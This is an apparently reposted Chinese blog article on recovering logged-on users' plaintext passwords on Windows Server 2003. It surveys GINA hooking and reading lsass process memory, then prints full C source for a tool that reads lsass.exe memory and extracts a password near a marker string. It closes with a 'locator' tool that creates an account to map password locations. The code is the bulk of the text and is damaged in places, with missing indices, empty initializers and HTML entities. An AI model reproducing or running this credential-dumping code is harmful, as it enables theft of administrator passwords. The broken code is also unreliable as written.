在win 2003中得到登陆密码 win 2003,登陆,密码

2.使用Gina和winlogon进行套接,只要对某些函数执行自己的记录密码的代码,就可以将密码记录下来,稳定性高,而且对本地或远程登陆都有效,不过现存的gina后门程序在XP或2003中都有些函数没有被导出过,主要因为xp和2003等在winlogon中加入了新的函数。 3.直接读取内存数据得到明文密码。在NT 4.0/2K中,早就有程序findpass可以直接读到winlogon进程中的内存数据而直接得到登陆用户密码,因为在NT4.0和2K中,帐号的信息,包括域名,帐号和密码都是有规律地在winlogon内存中的特定地址中,所以可以很简单就得到。但在XP和2003系统中,这样方法是无效的了,似乎我们是没有办法直接读出明文地址了。下面我们就来谈谈如何象findpass在NT 4.0和2K在,在server 2003中得到登陆用户的密码。 虽然XP和2003是不象以前的NT系统那样将登陆用户信息保存在winlogon进程的内存地址内,但是基Lsass进程对于要处理些信息时,需要得到明文的登陆用户密码,所以登陆用户的密码会在Lsass进程中出现(微软没有将密码在Lsass进程中进行加密,微软的说法是因为Lsass需要得到明文的密码,就算将密码加密,也都只能用可逆的方法加密,只要跟踪lsass的操作,一样可以得到明文密码,所以微软使用了比较懒惰的方法,可能也是为了加快响应速度,所以将明文密码更是放在lsass进程内存内)。说到这里,大家心里都清楚了,登陆用户的密码是在lsass进程的内存中。对,就是这么一回事,但是要得到这个明文密码,真是象使用NT 4.0和2K下的findpass那样容易吗?事实上并不是那么容易,因为以下几个原因: A.密码存放在lsass进程中的内存地址是没有规律的 B.密码有可能被最后登陆的用户复盖(例如管理员abc从本地登陆,然后管理员bbb从远程登陆,然后管理员bbb注销终端,存放在lsass.exe进程内存中的密码,还是管理员bbb的密码),又或者用户登陆后,然后注销了,那么我们就算得到了密码,也不知道是哪个用户的密码。 C.密码前后的数据也是没有规律的,如果有规律,例如密码前的数据,一定是有一段全是01字符的数据段,那么定位密码就简单。 原因A和C都给我们带来定位密码的困难,原B就带来不能确定密码和帐号对应的问题.看来微软在新的系统还是做过点功夫。不过我们是不会放弃的,就算是碰碰运气,也看能不能得到密码,反正就算失败,也没什么关系。 最后的代码,是我写来测试是不是能在2003的系统中得到登际用户的密码,结果也正好象我们上面的分析一样(当然了,上面的结果是用这程序测测得到的)。成功率当然不高,因为受太多原因所影响,定位密码上的困难或者无法定位,或者得到不是密码的信息等等的原因,都令失败率显得相当高,不过总还是一种方法,或者将来有人可以准确定位到,那就是令人高兴了。虽然说失败率高,但在一种情况下,成功率却是很高的,那就是管理员只是在本地或终端中登陆了,以后再没有用户从本地或终端登陆过,而且管理员也没有锁上过系统,那么成功率就会是相当高的了。 提高成功率的两种做法: 1.程序直接写成服务,定时检查本地或远程登陆(其实没什么分别),当检测到登陆后,去搜索lsass进程内存,尝试得到密码。

2.程序模拟一个登陆(使用LogonUser()就能搞定),因为使用LogonUser()这个API,你要提供帐号名和对应的正确的密码,才可以成功,然后你就可以去搜索lsass进程内存。因为知道密码是什么,我们就能定位到密码是保存在什么地方。因为登陆用户的密码都是保存在同一个地址或相离不远的地址中,模拟登陆和搜索,可以先定位以后登陆的用户的密码会大约保存在什么位置。 无论怎说,三种方法中,最稳定,最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法,毕竟是改动了系统的东西,对系统的稳定性来说,会有考验,直接搜索lsass进程内存的方法呢,虽说也是困难,但准确性,成功率却又是低。 下面的代码使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串,因为在相当多的测试中,密码都是保存在有这个字符串的地址后一点的位置中,当然了,很多系统并没有这个字符串,或者就算有,我们得到的都是错误的密码。 代码: //********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include

  1<stdio.h>   
  2#include <windows.h>   
  3#include <tlhelp32.h> #define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable char Password[MAX_PATH] = ; // Store The Found Password // Function ProtoType Declaration   
  4//------------------------------------------------------------------------------------------------------   
  5BOOL FindPassword(DWORD PID);   
  6int Search(char *Buffer,const UINT nSize);   
  7DWORD GetLsassPID();   
  8BOOL Is2003();   
  9//------------------------------------------------------------------------------------------------------   
 10// End Of Fucntion ProtoType Declaration int main()   
 11{   
 12DWORD PID = 0;   
 13printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n"); if (!Is2003()) // Check Out If The Box Is 2003   
 14{   
 15printf("The Program Can't Only Run On Windows 2003 Platform\n");   
 16return -1;   
 17} PID = GetLsassPID(); // Get The Lsass.exe PID if (PID == 0) // Fail To Get PID If Returning Zerom   
 18{   
 19return -1;   
 20} FindPassword(PID); // Find The Password From Lsass.exe Memory   
 21return 0;   
 22}   
 23// End main() //------------------------------------------------------------------------------------   
 24// Purpose: Search The Memory &amp; Try To Get The Password   
 25// Return Type: int   
 26// Parameters:   
 27// In: char *Buffer --&gt; The Memory Buffer To Search   
 28// Out: const UINT nSize --&gt; The Size Of The Memory Buffer   
 29// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",   
 30// Since The Password Is Near The Above Location,But It's Not Always True That   
 31// We Will Find The Magic String,Or Even We Find It,The Password May Be Located   
 32// At Some Other Place.We Only Look For Luck   
 33//------------------------------------------------------------------------------------   
 34int Search(char *Buffer,const UINT nSize)   
 35{   
 36UINT OffSet = 0;   
 37UINT i = 0;   
 38UINT j = 0 ;   
 39UINT Count = 0;   
 40if (Buffer == NULL)   
 41{   
 42return -1;   
 43}   
 44for (i = 0 ; i &lt; nSize ; i++)   
 45{   
 46/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word   
 47Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate   
 48The Magic String,We Have To Do It Manually And Slowly   
 49*/   
 50if (Buffer == 'L')   
 51{   
 52OffSet = 0;   
 53if (strnicmp(&amp;Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)   
 54{   
 55OffSet += strlen("LocalSystem") + 1;   
 56if (strnicmp(&amp;Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)   
 57{   
 58OffSet += strlen("Remote") + 1;   
 59if (strnicmp(&amp;Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)   
 60{   
 61OffSet += strlen("Procedure") + 1;   
 62if (strnicmp(&amp;Buffer[i + OffSet],"Call",strlen("Call")) == 0)   
 63{   
 64i += OffSet;   
 65break;   
 66}   
 67}   
 68}   
 69}   
 70}   
 71}   
 72if (i &lt; nSize)   
 73{   
 74ZeroMemory(Password,sizeof(Password));   
 75for (; i &lt; nSize ; i++)   
 76{   
 77if (Buffer == 0x02 &amp;&amp; Buffer[i + 1] == 0 &amp;&amp; Buffer[i + 2] == 0 &amp;&amp; Buffer[i + 3] == 0 &amp;&amp; Buffer[i + 4] == 0 &amp;&amp; Buffer[i + 5] == 0 &amp;&amp; Buffer[i + 6] == 0)   
 78{   
 79/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In   
 80That Way   
 81*/   
 82j = i + 7;   
 83for (; j &lt; nSize; j += 2)   
 84{   
 85if (Buffer[j] &gt; 0)   
 86{   
 87Password[Count++] = Buffer[j];   
 88}   
 89else   
 90{   
 91break;   
 92}   
 93}   
 94return i + 7; // One Flag To Indicate We Find The Password   
 95}   
 96}   
 97}   
 98return -1; // Well,We Fail To Find The Password,And This Always Happens   
 99}   
100// End Search //------------------------------------------------------------------------------------   
101// Purpose: To Get The Lsass.exe PID   
102// Return Type: DWORD   
103// Parameters: None   
104//------------------------------------------------------------------------------------   
105DWORD GetLsassPID()   
106{   
107HANDLE hProcessSnap;   
108HANDLE hProcess = NULL;   
109PROCESSENTRY32 pe32;   
110DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);   
111if( hProcessSnap == INVALID_HANDLE_VALUE )   
112{   
113printf("Fail To Create Snap Shot\n");   
114return 0;   
115} pe32.dwSize = sizeof(PROCESSENTRY32); if( !Process32First(hProcessSnap, &amp;pe32))   
116{   
117CloseHandle(hProcessSnap); // Must clean up the snapshot object!   
118return 0;   
119} do   
120{   
121if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)   
122{   
123PID = pe32.th32ProcessID;   
124break;   
125}   
126}while(Process32Next( hProcessSnap, &amp;pe32)); CloseHandle( hProcessSnap);   
127return PID;   
128}   
129// End GetLsassPID() //------------------------------------------------------------------------------------   
130// Purpose: To Find The Password   
131// Return Type: BOOLEAN   
132// Parameters:   
133// In: DWORD PID -&gt; The Lsass.exe's PID   
134//------------------------------------------------------------------------------------   
135BOOL FindPassword(DWORD PID)   
136{   
137HANDLE hProcess = NULL;   
138char Buffer[5 * 1024] = ;   
139DWORD ByteGet = 0;   
140int Found = -1; hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process   
141if (hProcess == NULL)   
142{   
143printf("Fail To Open Process\n");   
144return FALSE;   
145} if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&amp;ByteGet)) // Read The Memory From Lsass.exe   
146{   
147printf("Fail To Read Memory\n");   
148CloseHandle(hProcess);   
149return FALSE;   
150} CloseHandle(hProcess);   
151  
152Found = Search(Buffer,ByteGet); // Search The Password   
153if (Found &gt;= 0) // We May Find The Password   
154{   
155if (strlen(Password) &gt; 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not   
156{   
157printf("Found Password At #0x%x -&gt; \"%s\"\n",Found + BaseAddress,Password);   
158}   
159}   
160else   
161{   
162printf("Fail To Find The Password\n");   
163}   
164return TRUE;   
165}   
166// End FindPassword //------------------------------------------------------------------------------------   
167// Purpose: Check If The Box Is Windows 2003   
168// Return Type: BOOLEAN   
169// Parameters: None   
170//------------------------------------------------------------------------------------   
171BOOL Is2003()   
172{   
173OSVERSIONINFOEX osvi;   
174BOOL b0sVersionInfoEx;   
175ZeroMemory(&amp;osvi,sizeof(OSVERSIONINFOEX));   
176osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX); if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&amp;osvi)))   
177{   
178osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);   
179}   
180return (osvi.dwMajorVersion == 5 &amp;&amp; osvi.dwMinorVersion == 2);   
181}   
182// End Is2003()   
183// End Of File 附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码. **用法:** 1.locator 字符串 -&gt; 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置 2.Locator 用户名 密码 -&gt; 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。</tlhelp32.h></windows.h></stdio.h>
Published At
Categories with 服务器类
Tagged with
comments powered by Disqus